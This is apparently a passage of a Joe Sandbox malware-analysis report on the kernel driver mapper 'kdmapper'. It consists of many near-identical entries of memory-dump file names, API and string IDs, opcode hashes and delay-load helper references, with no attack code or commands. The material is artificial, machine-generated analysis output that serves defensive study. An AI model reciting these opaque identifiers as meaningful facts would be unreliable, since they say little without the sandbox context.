                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 7351492e2ada675676f2c7c05759a8973cd39e040ba6b62247ddadb4fb4f5998
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 7351492e2ada675676f2c7c05759a8973cd39e040ba6b62247ddadb4fb4f5998
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 1da4708750b03ce9609979014a29840680233057a9260b6bf09d1f355acc6146
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 1da4708750b03ce9609979014a29840680233057a9260b6bf09d1f355acc6146
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: a1b7b41d7bffb215012b837395f6c823b75e5dcc4e42c4244e2c6ef31fc8380d
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: a1b7b41d7bffb215012b837395f6c823b75e5dcc4e42c4244e2c6ef31fc8380d
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 6db26f44ac68ec145484b6382fad194c7ecec6cb3cfccb43397bc3105a65e652
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 6db26f44ac68ec145484b6382fad194c7ecec6cb3cfccb43397bc3105a65e652
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 86719b9c4a7f1b7e4a5febdcbd38afb68aab8fa6b96b8c51d36f6cd6913eb073
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 86719b9c4a7f1b7e4a5febdcbd38afb68aab8fa6b96b8c51d36f6cd6913eb073
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: d179e93af2843dcb233d3d654345475c325dd3e917c71f0ba1dcb052e3862462
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: d179e93af2843dcb233d3d654345475c325dd3e917c71f0ba1dcb052e3862462
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 8977ba257f8b494f23ca48ec8734b445b30ef38779ede05546fcdcc5a9b2cf9e
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 8977ba257f8b494f23ca48ec8734b445b30ef38779ede05546fcdcc5a9b2cf9e
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 4b99427fbb954ce3f37f440fc66b6d9f91b5df141e89341b2260d21db59717ab
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b99427fbb954ce3f37f440fc66b6d9f91b5df141e89341b2260d21db59717ab
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: db610d2573560c0ecdd4ed7a2efea20afd03ec1574daefbbd50f6dcdd9a311f0
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: db610d2573560c0ecdd4ed7a2efea20afd03ec1574daefbbd50f6dcdd9a311f0
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 72fbc538cdbf1b07d44ae459bde923f0f76b28726a5926d388d59d669a5d6493
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 72fbc538cdbf1b07d44ae459bde923f0f76b28726a5926d388d59d669a5d6493
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 58087c8907fe1672bdf1d4befae10936b1fc0482989504b7c753ed55a4796339
                                                                                                                                                                          • Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
                                                                                                                                                                          • Opcode Fuzzy Hash: 58087c8907fe1672bdf1d4befae10936b1fc0482989504b7c753ed55a4796339
                                                                                                                                                                          • Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: 37e73def70b4a1baf9415127e69e11f9f3a3849fcee598d2e43fde630c6a4169
                                                                                                                                                                          • Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
                                                                                                                                                                          • Opcode Fuzzy Hash: 37e73def70b4a1baf9415127e69e11f9f3a3849fcee598d2e43fde630c6a4169
                                                                                                                                                                          • Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E580
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: F0wnc
                                                                                                                                                                          • API String ID: 1269201914-3598844980
                                                                                                                                                                          • Opcode ID: 5ee0ac6d781d391d120b470c907c0862c2627b231441cbbdd65a2d6d342dc6f4
                                                                                                                                                                          • Instruction ID: 44cb1fbbcd176af803b07b345964d5acaa0b62ee02abb538cd03141ba70ee32f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ee0ac6d781d391d120b470c907c0862c2627b231441cbbdd65a2d6d342dc6f4
                                                                                                                                                                          • Instruction Fuzzy Hash: F4A011C2AA8200BC300822A02C02C3B020FC0C2B3AB32822EF802800C0A8820A0A08B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
